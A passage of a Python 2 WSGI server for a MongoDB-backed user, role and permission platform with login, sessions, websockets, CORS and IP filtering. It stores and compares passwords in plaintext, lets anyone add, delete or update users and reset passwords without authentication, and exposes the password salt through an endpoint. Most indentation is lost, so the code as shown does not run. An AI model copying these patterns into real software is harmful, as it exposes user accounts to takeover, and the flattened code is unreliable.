arr = uniqueIndex.split(',')
for indexName in arr:
indexName = indexName.strip()
if querydict.has_key(indexName):
cond[indexName] = querydict[indexName]
if len(cond.keys())>1:
idlist = []
cur = fs.find(cond)
for i in cur:
idlist.append(i._id)
for i in idlist:
fs.delete(i)
del querydict['_uniqueIndex']
_id = fs.put(buf, **querydict)
except gridfs.errors.FileExists:
if querydict.has_key('_id'):
_id = db_util.add_mongo_id(querydict['_id'])
fs.delete(_id)
_id = fs.put(buf, **querydict)
except:
raise
body = json.dumps({'_id':db_util.remove_mongo_id(_id)}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':u'cannot find wsgi app [%s]' % app}, ensure_ascii=True, indent=4)
return body
def handle_authorize_platform(environ, session):
global ENCODING
global gConfig, gRequest, gSessionStore, gUrlMap, gSecurityConfig, gWebSocketsMap, gJoinableQueue
def get_collection(collection):
ret = None
db_util.mongo_init_client('authorize_platform')
db = db_util.gClientMongo['authorize_platform'][gConfig['authorize_platform']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
def get_all_functions():
ret = []
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_functions'])
ret = list(collection.find({}))
#for i in cur:
#ret.append(i)
return ret
def get_all_roles(exclude_template=False):
ret = []
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_roles'])
if exclude_template:
ret = list(collection.find({'name':{'$not':re.compile("template")}}))
else:
ret = list(collection.find({}))
#for i in cur:
#ret.append(i)
return ret
def check_role_can_be_delete(_id):
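        # A role may only be deleted if no user record's 'roles' list references its _id.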
def get_id_list(node):
reet = []
if node.has_key('roles'):
for i in node['roles']:
reet.append(i)
return reet
ret = True
for i in get_user():
idlist = get_id_list(i)
if _id in idlist:
ret = False
break
return ret
def check_function_can_be_delete(_id):
def get_id_list(node):
reet = []
if node.has_key('_id'):
reet.append(node['_id'])
if node.has_key('children'):
for i in node['children']:
reet.extend(get_id_list(i))
return reet
ret = True
for i in get_all_roles():
idlist = get_id_list(i)
if _id in idlist:
ret = False
break
return ret
def check_valid_user(session, user=None):
ret = False
if session and session.has_key('username') and len(session['username'])>0:
if user:
ret = session['username'] == user
else:
ret = True
return ret
def function_add(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_functions'])
if querydict.has_key('name'):
existone = collection.find_one({'name':querydict['name']})
if existone:
ret = json.dumps({'result':u'function_add_fail_name_exist'}, ensure_ascii=True, indent=4)
else:
_id = collection.save(db_util.add_mongo_id(querydict))
rec = collection.find_one({'_id':_id})
ret = db_util.remove_mongo_id(rec)
ret = json.dumps(ret, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'function_add_fail_name_required'}, ensure_ascii=True, indent=4)
return ret
def function_query(session, querydict):
#if not check_valid_user(session, 'admin'):
#return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
l = get_all_functions()
ret = json.dumps(db_util.remove_mongo_id(l), ensure_ascii=True, indent=4)
return ret
def function_update(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_functions'])
if querydict.has_key('_id'):
wr = collection.update({'_id':db_util.add_mongo_id(querydict['_id'])}, db_util.add_mongo_id(querydict), multi=False, upsert=False)
rec = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
ret = db_util.remove_mongo_id(rec)
ret = json.dumps(ret, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'function_update_fail_id_required'}, ensure_ascii=True, indent=4)
return ret
def function_delete(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_functions'])
if querydict.has_key('_id'):
existone = collection.find_one({'_id': db_util.add_mongo_id(querydict['_id'])})
if existone:
if check_function_can_be_delete(existone['_id']):
wr = collection.remove({'_id':db_util.add_mongo_id(existone['_id'])})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'function_delete_fail_need_deleted_in_role_first'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'function_delete_fail_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'function_delete_fail_id_required'}, ensure_ascii=True, indent=4)
return ret
def role_add(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_roles'])
if querydict.has_key('name'):
existone = collection.find_one({'name':querydict['name']})
if existone:
ret = json.dumps({'result':u'role_add_fail_name_already_exist'}, ensure_ascii=True, indent=4)
else:
_id = collection.save(db_util.add_mongo_id(querydict))
rec = collection.find_one({'_id':_id})
ret = db_util.remove_mongo_id(rec)
ret = json.dumps(ret, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'role_add_fail_name_required'}, ensure_ascii=True, indent=4)
return ret
def role_query(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
l = get_all_roles(True)
ret = json.dumps(db_util.remove_mongo_id(l), ensure_ascii=True, indent=4)
return ret
def role_update(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_roles'])
if querydict.has_key('_id'):
wr = collection.update({'_id':db_util.add_mongo_id(querydict['_id'])}, db_util.add_mongo_id(querydict), multi=False, upsert=False)
rec = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
ret = db_util.remove_mongo_id(rec)
ret = json.dumps(ret, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'role_update_fail_id_required'}, ensure_ascii=True, indent=4)
return ret
def role_delete(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_roles'])
if querydict.has_key('_id'):
existone = collection.find_one({'_id': db_util.add_mongo_id(querydict['_id'])})
if existone:
if check_role_can_be_delete(existone['_id']):
wr = collection.remove({'_id':db_util.add_mongo_id(existone['_id'])})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'role_delete_fail_need_delete_in_user_first'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'role_delete_fail_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'role_delete_fail_id_required'}, ensure_ascii=True, indent=4)
return ret
def role_template_get(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
l = get_all_roles()
for i in l:
if i['name'] == 'template':
ret = json.dumps(db_util.remove_mongo_id(i), ensure_ascii=True, indent=4)
break
if len(ret) == 0:
ret = json.dumps({}, ensure_ascii=True, indent=4)
return ret
def role_template_save(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_roles'])
if querydict.has_key('_id'):
wr = collection.update({'_id':db_util.add_mongo_id(querydict['_id'])}, db_util.add_mongo_id(querydict), multi=False, upsert=False)
rec = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
ret = db_util.remove_mongo_id(rec)
ret = json.dumps(ret, ensure_ascii=True, indent=4)
else:
#ret = json.dumps({'result':u'role_template_save_fail_id_required'}, ensure_ascii=True, indent=4)
_id = collection.save(db_util.add_mongo_id(querydict))
if _id:
querydict['_id'] = _id
ret = json.dumps(db_util.remove_mongo_id(querydict), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'role_template_save_fail'}, ensure_ascii=True, indent=4)
return ret
def get_user(user=None):
ret = []
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_user_account'])
if user:
ret = list(collection.find({'username':user}))
else:
ret = list(collection.find({}))
#for i in cur:
#ret.append(i)
return ret
def get_funclist_by_roles(roles):
def get_func_list(node):
ret = []
if node.has_key('_id'):
if node.has_key('checked') and node['checked'] is True:
ret.append(node['_id'])
if node.has_key('children'):
for i in node['children']:
ret.extend(get_func_list(i))
return ret
ret = []
rolelist = get_all_roles(True)
for node in rolelist:
if node.has_key('_id') and node['_id'] in roles:
ret.extend(get_func_list(node))
return ret
def check_user_has_function(session, querydict):
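        # for every function id in querydict['functions'], report whether the named user's
        # roles enable it; answers a list of {'_id': ..., 'enable': True/False} objects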
ret = ''
if not check_valid_user(session):
return json.dumps({'result':u'username_required'}, ensure_ascii=True, indent=4)
if querydict.has_key('username') :
if querydict.has_key('functions') :
if len(querydict['functions'])>0:
userlist = get_user(querydict['username'])
if len(userlist)>0:
if userlist[0].has_key('roles') and isinstance(userlist[0]['roles'], list) and len(userlist[0]['roles'])>0:
roles = userlist[0]['roles']
funclist = get_funclist_by_roles(roles)
retlist = []
for f in querydict['functions']:
o = {}
o['_id'] = f
if ObjectId(f) in funclist:
o['enable'] = True
else:
o['enable'] = False
retlist.append(o)
ret = json.dumps(retlist, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'this_user_has_no_role'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'username_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'function_id_list_required'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'functions_required'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'username_required'}, ensure_ascii=True, indent=4)
return ret
def user_query(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
if querydict.has_key('username') and len(querydict['username'])>0:
l = get_user(querydict['username'])
if len(l)>0:
ret = json.dumps(db_util.remove_mongo_id(l[0]), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'username_not_found'}, ensure_ascii=True, indent=4)
else:
l = get_user()
ret = json.dumps(db_util.remove_mongo_id(l), ensure_ascii=True, indent=4)
return ret
def user_add(session, querydict):
ret = ''
if querydict.has_key('username') and querydict.has_key('password') and len(querydict['username'])>0 and len(querydict['password'])>0:
try:
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_user_account'])
existone = collection.find_one({'username':querydict['username']})
if existone:
ret = json.dumps({'result':u'register_fail_username_already_exist'}, ensure_ascii=True, indent=4)
else:
_id = collection.save(db_util.add_mongo_id(querydict))
rec = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(rec), ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'register_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'register_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'register_fail_username_password_required'}, ensure_ascii=True, indent=4)
return ret
def user_delete(session, querydict):
ret = ''
if querydict.has_key('username') and len(querydict['username'])>0:
try:
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_user_account'])
existone = collection.find_one({'username':querydict['username']})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'unregister_fail_not_exist' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'unregister_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'unregister_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'unregister_fail_username_required'}, ensure_ascii=True, indent=4)
return ret
def reset_password(session, querydict):
ret = ''
if querydict.has_key('username') and len(querydict['username'])>0 and querydict.has_key('password') and len(querydict['password'])>0:
try:
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_user_account'])
one = collection.find_one({'username':querydict['username']})
if one:
collection.update({'username':querydict['username']}, {'$set':{'password':querydict['password']}}, multi=False, upsert=False)
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'reset_password_fail_not_exist'}, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'reset_password_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'reset_password_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'reset_password_fail_username_password_required'}, ensure_ascii=True, indent=4)
return ret
def user_update(session, querydict):
ret = ''
if querydict.has_key('username') and len(querydict['username'])>0 :
try:
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_user_account'])
one = collection.find_one({'username':querydict['username']})
if one:
collection.update({'username':querydict['username']}, db_util.add_mongo_id(querydict), multi=False, upsert=False)
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_update_fail_not_exist'}, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'user_update_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_update_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_update_fail_username_required'}, ensure_ascii=True, indent=4)
return ret
def login(session, querydict):
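        # verify username/password against the user_account collection; when session_check_ip
        # is enabled, logins from a second IP are rejected.  Returns (json_body, ok_flag).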
ok = False
ret = ''
if querydict.has_key('username') and querydict.has_key('password') and len(querydict['username'])>0 and len(querydict['password'])>0:
try:
check, ip = session_check_user_ip(environ, querydict['username'])
if gSessionStore and not check:
ret = json.dumps({'result':u'other_ip_already_login:%s' % ip }, ensure_ascii=True, indent=4)
return ret, ok
if gSessionStore and session:
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_user_account'])
one = collection.find_one({'username':querydict['username'], 'password':querydict['password']})
if one:
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
ok = True
else:
ret = json.dumps({'result':u'login_fail_wrong_username_or_password' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'login_fail_session_expired' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'login_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'login_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'login_fail_username_password_required'}, ensure_ascii=True, indent=4)
return ret, ok
def auth_check(session, querydict, isnew):
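        # isnew=True binds the username to the current session and saves it;
        # isnew=False only verifies that the session still belongs to that username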
ret = ''
if session :
if querydict.has_key('username') and len(querydict['username'])>0:
if isnew is True:
session['username'] = querydict['username']
gSessionStore.save(session)
ret = json.dumps({'result':u'auth_check_ok_session_saved'}, ensure_ascii=True, indent=4)
else:
if session.sid:
user = gSessionStore.get_data_by_username(session.sid, querydict['username'])
if user:
ret = json.dumps({'result':u'auth_check_ok_user_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'auth_check_fail_session_expired'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'auth_check_fail_session_expired'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'auth_check_fail_username_require'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'auth_check_fail_session_expired'}, ensure_ascii=True, indent=4)
return ret
def sub(uid, channel, websocket):
if uid and websocket and not websocket.closed:
if not gWebSocketsMap.has_key(uid + '|' + channel):
gWebSocketsMap[uid + '|' + channel] = websocket
def unsub(uid, channels):
        # note: this drains the passed-in channel list while unregistering its websockets
        while len(channels)>0:
            key = channels.pop(0)
            if uid and gWebSocketsMap.has_key(uid + '|' + key):
                del gWebSocketsMap[uid + '|' + key]
def handle_websocket(environ):
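        # websocket loop: serves session_list queries and (un)subscriptions,
        # session_remove requests and queue_size polls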
ws = get_websocket(environ)
app = gConfig['wsgi']['application']
session_id = None
channel = ''
if environ.has_key('HTTP_COOKIE'):
arr = environ['HTTP_COOKIE'].split('=')
if len(arr)>1:
session_id = arr[1]
interval = 1.0
try:
interval = float(gConfig[app]['websocket']['interval_poll'])
except:
interval = 1.0
while ws and not ws.closed:
obj = ws_recv(environ)
if obj and isinstance(obj, dict) and obj.has_key('op'):
#print(obj)
if obj['op'] == 'session_list':
ws.send(ws_session_query())
elif obj['op'] == 'subscribe/session_list':
sub(session_id, 'session_list', ws)
elif obj['op'] == 'unsubscribe/session_list':
unsub(session_id, ['session_list',])
elif obj['op'] == 'session_remove':
if obj.has_key('id') and len(obj['id'])>0:
print('remove session from client:')
print(obj['id'])
gSessionStore.delete_by_id(obj['id'])
elif obj['op'] == 'queue_size':
qsize = 0
if gJoinableQueue:
qsize = gJoinableQueue.qsize()
ws.send(json.dumps({'queue_size':qsize}, ensure_ascii=True, indent=4))
else:
try:
ws.send('')
except:
for k in gWebSocketsMap.keys():
if gWebSocketsMap[k] is ws:
gWebSocketsMap[k].close()
del gWebSocketsMap[k]
break
gevent.sleep(interval)
if ws and ws.closed:
del ws
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
isnew = False
urls = gUrlMap.bind_to_environ(environ)
querydict, buf = get_querydict_by_GET_POST(environ)
endpoint = ''
try:
endpoint, args = urls.match()
if args.has_key('username'):
querydict['username'] = args['username']
if args.has_key('password'):
querydict['password'] = args['password']
if endpoint == 'auth_check':
body = auth_check(session, querydict, False)
elif endpoint == 'handle_websocket':
handle_websocket(environ)
elif endpoint == 'get_salt':
if len(gSecurityConfig.keys())>0:
body = json.dumps({'result':'get_salt_ok','salt':gSecurityConfig['password_salt']}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'get_salt_fail'}, ensure_ascii=True, indent=4)
elif endpoint == 'user_add':
body = user_add(session, querydict)
elif endpoint == 'user_check':
body = check_user_has_function(session, querydict)
elif endpoint == 'user_delete':
body = user_delete(session, querydict)
elif endpoint == 'user_query':
body = user_query(session, querydict)
elif endpoint == 'user_update':
body = user_update(session, querydict)
elif endpoint == 'reset_password':
body = reset_password(session, querydict)
elif endpoint == 'login':
body, loginok = login(session, querydict)
if loginok:
if querydict.has_key('username') and len(querydict['username'])>0:
session['username'] = querydict['username']
elif endpoint == 'logout':
if gSessionStore and session:
gSessionStore.delete(session)
session = None
body = json.dumps({'result':u'logout_ok'}, ensure_ascii=True, indent=4)
elif endpoint == 'function_add':
body = function_add(session, querydict)
elif endpoint == 'function_query':
body = function_query(session, querydict)
elif endpoint == 'function_update':
body = function_update(session, querydict)
elif endpoint == 'function_delete':
body = function_delete(session, querydict)
elif endpoint == 'role_add':
body = role_add(session, querydict)
elif endpoint == 'role_update':
body = role_update(session, querydict)
elif endpoint == 'role_query':
body = role_query(session, querydict)
elif endpoint == 'role_delete':
body = role_delete(session, querydict)
elif endpoint == 'role_template_save':
body = role_template_save(session, querydict)
elif endpoint == 'role_template_get':
body = role_template_get(session, querydict)
else:
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
except HTTPException, e:
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
if session:
gSessionStore.save(session)
return statuscode, headers, body
def CORS_header(h={}):
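    # merge CORS response headers into `h` when web.cors.enable_cors is true, preferring the
    # per-application cors section over the global web one; permissive defaults are used when
    # the configured values cannot be read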
global gConfig
def default_header(h={}):
ret = {};
for k in h.keys():
ret[k] = h[k]
ret['Access-Control-Allow-Origin'] = '*'
ret['Access-Control-Allow-Credentials'] = 'true'
ret['Access-Control-Expose-Headers'] = 'true'
ret['Access-Control-Max-Age'] = '3600'
ret['Access-Control-Allow-Methods'] = 'POST,GET,OPTIONS'
return ret
headers = {}
for k in h.keys():
headers[k] = h[k]
if gConfig['web']['cors']['enable_cors'].lower() == 'true':
app = gConfig['wsgi']['application']
if gConfig.has_key(app) and gConfig[app].has_key('cors'):
try:
if gConfig[app]['cors'].has_key('Access-Control-Allow-Origin'):
headers['Access-Control-Allow-Origin'] = str(gConfig[app]['cors']['Access-Control-Allow-Origin'])
if gConfig[app]['cors'].has_key('Access-Control-Allow-Credentials'):
headers['Access-Control-Allow-Credentials'] = str(gConfig[app]['cors']['Access-Control-Allow-Credentials'])
if gConfig[app]['cors'].has_key('Access-Control-Expose-Headers'):
headers['Access-Control-Expose-Headers'] = str(gConfig[app]['cors']['Access-Control-Expose-Headers'])
if gConfig[app]['cors'].has_key('Access-Control-Max-Age'):
headers['Access-Control-Max-Age'] = str(gConfig[app]['cors']['Access-Control-Max-Age'])
if gConfig[app]['cors'].has_key('Access-Control-Allow-Methods'):
s = gConfig[app]['cors']['Access-Control-Allow-Methods']
if isinstance(s, list):
s = ','.join(s)
headers['Access-Control-Allow-Methods'] = str(s)
except:
headers = default_header(h)
else:
try:
if gConfig['web']['cors'].has_key('Access-Control-Allow-Origin'):
headers['Access-Control-Allow-Origin'] = str(gConfig['web']['cors']['Access-Control-Allow-Origin'])
if gConfig['web']['cors'].has_key('Access-Control-Allow-Credentials'):
headers['Access-Control-Allow-Credentials'] = str(gConfig['web']['cors']['Access-Control-Allow-Credentials'])
if gConfig['web']['cors'].has_key('Access-Control-Expose-Headers'):
headers['Access-Control-Expose-Headers'] = str(gConfig['web']['cors']['Access-Control-Expose-Headers'])
if gConfig['web']['cors'].has_key('Access-Control-Max-Age'):
headers['Access-Control-Max-Age'] = str(gConfig['web']['cors']['Access-Control-Max-Age'])
if gConfig['web']['cors'].has_key('Access-Control-Allow-Methods'):
s = gConfig['web']['cors']['Access-Control-Allow-Methods']
if isinstance(s, list):
s = ','.join(s)
headers['Access-Control-Allow-Methods'] = str(s)
except:
headers = default_header(h)
return headers
def check_is_static(aUrl):
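    # a URL is treated as a static resource when its file extension appears in gConfig['mime_type']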
global STATICRESOURCE_DIR
global gConfig
ret = False
surl = dec(aUrl)
if surl[0:2] == '//':
surl = surl[2:]
if surl[0] == '/':
surl = surl[1:]
    p = os.path.join(STATICRESOURCE_DIR, surl)
    if '.' in surl:
        ext = surl[surl.rindex('.'):]
    else:
        ext = os.path.splitext(p)[1]
if len(ext)>0 and gConfig['mime_type'].has_key(ext):
ret = True
return ret
def whitelist_check(environ, start_response):
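    # allow the request when no whitelist is configured, or when REMOTE_ADDR matches one of the
    # configured regular expressions (a single pattern string or a list of patterns)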
global gConfig
ret = True
if gConfig['listen_port'].has_key('whitelist') and len(gConfig['listen_port']['whitelist'])>0:
if isinstance(gConfig['listen_port']['whitelist'], unicode):
s = str(gConfig['listen_port']['whitelist'])
rere = re.compile(s)
if environ.has_key('REMOTE_ADDR') and len(rere.findall(environ['REMOTE_ADDR']))==0:
ret = False
elif isinstance(gConfig['listen_port']['whitelist'], list):
cnt = 0
ret = False
for i in gConfig['listen_port']['whitelist']:
s = str(i)
rere = re.compile(s)
if environ.has_key('REMOTE_ADDR') and len(rere.findall(environ['REMOTE_ADDR']))>0:
cnt += 1
if cnt>0:
ret = True
return ret
def blacklist_check(environ, start_response):
global gConfig
ret = True
if gConfig['listen_port'].has_key('blacklist') and len(gConfig['listen_port']['blacklist'])>0:
if isinstance(gConfig['listen_port']['blacklist'], unicode):
s = str(gConfig['listen_port']['blacklist'])
rere = re.compile(s)
if environ.has_key('REMOTE_ADDR') and len(rere.findall(environ['REMOTE_ADDR']))>0:
ret = False
elif isinstance(gConfig['listen_port']['blacklist'], list):
cnt = 0
ret = True
for i in gConfig['listen_port']['blacklist']:
s = str(i)
rere = re.compile(s)
if environ.has_key('REMOTE_ADDR') and len(rere.findall(environ['REMOTE_ADDR']))>0:
cnt += 1
if cnt>0:
ret = False
return ret
def ip_check(environ, start_response):
ret = False
if whitelist_check(environ, start_response) and blacklist_check(environ, start_response):
ret = True
return ret
def session_check_user_ip(environ, username):
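    # when session_check_ip is enabled, refuse the login if the user already holds a session
    # bound to a different IP; returns (ok, remote_ip)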
global gConfig, gSessionStore
ret = True
ip = environ['REMOTE_ADDR']
if gConfig['authorize_platform']['session']['session_check_ip'].lower() == 'true':
l = gSessionStore.get_list_by_username(username)
for i in l:
if i.has_key('ip') and i['ip'] != environ['REMOTE_ADDR']:
ret = False
break
return ret, ip
def get_websocket(environ):
ret = None
if environ.has_key("wsgi.websocket") and environ['wsgi.websocket']:
ret = environ['wsgi.websocket']
return ret
def ws_send(channel=None, string=''):
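    # broadcast `string` to every registered websocket (or only those whose key contains the
    # given channel), removing sockets that have already been closed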
global gWebSocketsMap
for k in gWebSocketsMap.keys():
ws = None
if channel:
if '|' + channel in k:
ws = gWebSocketsMap[k]
else:
ws = gWebSocketsMap[k]
if ws and not ws.closed:
try:
ws.send(string)
except geventwebsocket.WebSocketError, e:
print('ws_send exception:%s' % str(e))
elif ws and ws.closed:
del gWebSocketsMap[k]
def ws_session_query():
ret = json.dumps(db_util.remove_mongo_id(gSessionStore.list()), ensure_ascii=True, indent=4)
return ret
def ws_recv(environ):
ret = None
ws = get_websocket(environ)
if ws and not ws.closed:
msg = None
try:
msg = ws.receive()
except geventwebsocket.WebSocketError, e:
print('ws_recv exception:%s' % str(e))
if msg:
try:
ret = json.loads(msg)
except:
ret = msg
return ret
def application_combiz_platform(environ, start_response):
global STATICRESOURCE_DIR
global gConfig, gRequest, gSessionStore
def proxy(environ):
connection_timeout, network_timeout = 5.0, 10.0
proxy_type = ''
if '/proxy_platform' in path_info:
proxy_type = 'proxy_platform'
if '/proxy_file' in path_info:
proxy_type = 'proxy_file'
if '/proxy_pay' in path_info:
proxy_type = 'proxy_pay'
try:
connection_timeout = float(gConfig['combiz_platform'][proxy_type]['www_connection_timeout'])
except:
pass
try:
network_timeout = float(gConfig['combiz_platform'][proxy_type]['www_network_timeout'])
except:
pass
return handle_http_proxy(environ, proxy_type, gConfig['combiz_platform'][proxy_type]['protocol'], gConfig['combiz_platform'][proxy_type]['host'], gConfig['combiz_platform'][proxy_type]['port'], '', connection_timeout, network_timeout)
headers = {}
headerslist = []
cookie_header = None
body = ''
statuscode = '200 OK'
if not ip_check(environ, start_response):
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'your_ip_access_deny'}, ensure_ascii=True, indent=4)
start_response(statuscode, headerslist)
return [body]
path_info = environ['PATH_INFO']
statuscode = '200 OK'
if path_info[-1:] == '/':
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
elif check_is_static(path_info):
statuscode, headers, body = handle_static(environ, path_info)
elif len(path_info)>7 and path_info[:7] == '/proxy_':
statuscode, headers, body = proxy(environ)
else:
statuscode, headers, body = handle_combiz_platform(environ)
headers = CORS_header(headers)
for k in headers:
headerslist.append((k, headers[k]))
#print(headerslist)
start_response(statuscode, headerslist)
return [body]
def application_authorize_platform(environ, start_response):
global STATICRESOURCE_DIR
global gConfig, gRequest, gSessionStore
headers = {}
headerslist = []
cookie_header = None
body = ''
statuscode = '200 OK'
if not ip_check(environ, start_response):
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'your_ip_access_deny'}, ensure_ascii=True, indent=4)
start_response(statuscode, headerslist)
return [body]
path_info = environ['PATH_INFO']
if gSessionStore is None:
gSessionStore = MongodbSessionStore(host=gConfig['authorize_platform']['mongodb']['host'],
port=int(gConfig['authorize_platform']['mongodb']['port']),
replicaset=gConfig['authorize_platform']['mongodb']['replicaset'],
db = gConfig['authorize_platform']['mongodb']['database'],
collection = gConfig['authorize_platform']['mongodb']['collection_session'],
)
is_expire = False
statuscode = '200 OK'
if path_info[-1:] == '/':
#path_info += gConfig['web']['indexpage']
#statuscode, headers, body = handle_static(environ, path_info)
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
elif check_is_static(path_info):
statuscode, headers, body = handle_static(environ, path_info)
else:
with session_manager(environ):
sess, cookie_header, is_expire = check_session(environ, gRequest, gSessionStore)
if is_expire:
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
statuscode = '200 OK'
body = json.dumps({'result':u'session_expired'}, ensure_ascii=True, indent=4)
if sess:
if not sess.has_key('ip'):
sess['ip'] = environ['REMOTE_ADDR']
gSessionStore.save_if_modified(sess)
else:
statuscode, headers, body = handle_authorize_platform(environ, sess)
headers = CORS_header(headers)
if cookie_header:
headerslist.append(cookie_header)
for k in headers:
headerslist.append((k, headers[k]))
#print(headerslist)
start_response(statuscode, headerslist)
return [body]
def application_chat_platform(environ, start_response):
global STATICRESOURCE_DIR
global gConfig, gRequest, gSessionStore
headers = {}
headerslist = []
cookie_header = None
body = ''
statuscode = '200 OK'
if not ip_check(environ, start_response):
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'your_ip_access_deny'}, ensure_ascii=True, indent=4)
start_response(statuscode, headerslist)
return [body]
path_info = environ['PATH_INFO']
#if gSessionStore is None:
#gSessionStore = MongodbSessionStore(host=gConfig['chat_platform']['mongodb']['host'],
#port=int(gConfig['chat_platform']['mongodb']['port']),
#replicaset=gConfig['chat_platform']['mongodb']['replicaset'],
#db = gConfig['chat_platform']['mongodb']['database'],
